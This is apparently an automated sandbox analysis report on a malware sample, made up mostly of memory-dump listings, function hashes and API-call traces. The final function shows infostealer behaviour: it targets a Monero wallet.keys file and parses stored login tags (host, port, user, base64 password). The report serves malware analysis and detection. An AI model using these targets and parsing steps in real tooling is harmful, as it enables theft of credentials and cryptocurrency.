                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction ID: 7e481663e55d39b0ed35467e9da6c605c8df48034f8d9aa2bf07f30664ee7d6f
                                      • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction Fuzzy Hash: AAA13EB2A00A19CBEB19CF55DCC1A9ABBF1FB54314F24C66AD41AE73A0D334A944CF50
                                      Function 00B04288 Relevance: .2, Instructions: 240COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction ID: 14476d7e6e22e24870111e5b5ccf1497f6880675d4b3f25aeb9ae5c48088e0bc
                                      • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction Fuzzy Hash: 07A16072E083119BD308CF65C89075BF7E2EFC8710F1ACA3DA89997254D774E9419B82
                                      Function 00EF8D1B Relevance: .2, Instructions: 217COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89f259bb5f1e00a1994068da28ff28e432fba572633451a28dfcbd4a60d61cbc
                                      • Instruction ID: 49241b7541ddbf141b5e06741a6a62976dd94e566f5af78c8429e6e764bb7276
                                      • Opcode Fuzzy Hash: 89f259bb5f1e00a1994068da28ff28e432fba572633451a28dfcbd4a60d61cbc
                                      • Instruction Fuzzy Hash: C2612AF3E082105FE3189E79DC557BBBBD9DB90320F2B453DE689D7784E93858008296
                                      Function 00DB903E Relevance: .2, Instructions: 210COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 44cd83407dde9cf2b0344cd19bb3b90fc88963892893692f1e24fe6e2932a803
                                      • Instruction ID: e73ff2bbb6e2d0d636b677c5544d2626ddfce9c9dbe7eb23221108c95e61fd97
                                      • Opcode Fuzzy Hash: 44cd83407dde9cf2b0344cd19bb3b90fc88963892893692f1e24fe6e2932a803
                                      • Instruction Fuzzy Hash: 7151D3F3E08214AFF3146E19EC8577AB7D9EB94320F1B453DEAC897380E6395C458692
                                      Function 00E7379D Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f2f1346a131e224b119584b28726db9ac971c2babee18342a07a1125b246764
                                      • Instruction ID: d86f8496f96be1b94d7b9c04e34c6f1c3ebb9437c4f33d0f94fd710d2afbe8c6
                                      • Opcode Fuzzy Hash: 5f2f1346a131e224b119584b28726db9ac971c2babee18342a07a1125b246764
                                      • Instruction Fuzzy Hash: 9F513AF3A081005FF7045D39DC9977BBBD6DBD4320F2A453DE684C7784D93958068656
                                      Function 00FF54EA Relevance: .2, Instructions: 153COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bed329248fd931a7c3ffd4fad63dc96db4610194950ae4e2a78d58730add42b9
                                      • Instruction ID: ea2d403aac2bace814e32b51c82e0ee8d24ea38f319b4ca110850db988f1c9fb
                                      • Opcode Fuzzy Hash: bed329248fd931a7c3ffd4fad63dc96db4610194950ae4e2a78d58730add42b9
                                      • Instruction Fuzzy Hash: 2C518EB341CA18CFD7046F28D94563DFBE5EF14B14F6A082DE7D286624E6714880EB87
                                      Function 00B36799 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: 3780374d1abe532445ad759e0fdd973c30d97f7dea3f2d70ae28c5b512f841c7
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction Fuzzy Hash: 91511962E09BD585C7058B7944502EEBFF25FE6210F2E83DEC4981B382C2759689D3E5
                                      Function 00F8925F Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b53c8f321fc49d20a52b5791a6bcab9c9dfca1aa0d79c9654b5368038acf11a4
                                      • Instruction ID: 1cc348d26aeccc817fb16faab7efb9fd4986328f0ac6ddf0e9f368793e52332f
                                      • Opcode Fuzzy Hash: b53c8f321fc49d20a52b5791a6bcab9c9dfca1aa0d79c9654b5368038acf11a4
                                      • Instruction Fuzzy Hash: FE417EB250C704DFE305BF29DC856BAFBE5FF94320F16492ED6C082650EA3598458A97
                                      Function 00FC875A Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe676931c9f17ed35ebde4800ded3b94ed11883a4551aa1cfacf609f89983aaa
                                      • Instruction ID: f61c60ceaf4c88ed8466b13908a1ed1308a8831102fb021c244bf83080db9f46
                                      • Opcode Fuzzy Hash: fe676931c9f17ed35ebde4800ded3b94ed11883a4551aa1cfacf609f89983aaa
                                      • Instruction Fuzzy Hash: 5D01C5B250C2009BE319FE25D8867AEF7E6FB98321F06492DD7D583650E7346441CA97
                                      Function 00B075A8 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                      • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                      Function 00AD9AA0 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Function 00AD03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00AE0DBF,00AE0DBE,00AE0DBB,00AE0DBA), ref: 00AD04C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD04C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00AD04E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD04F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00AD052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00AD0579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD0587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00AD05C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD05D5
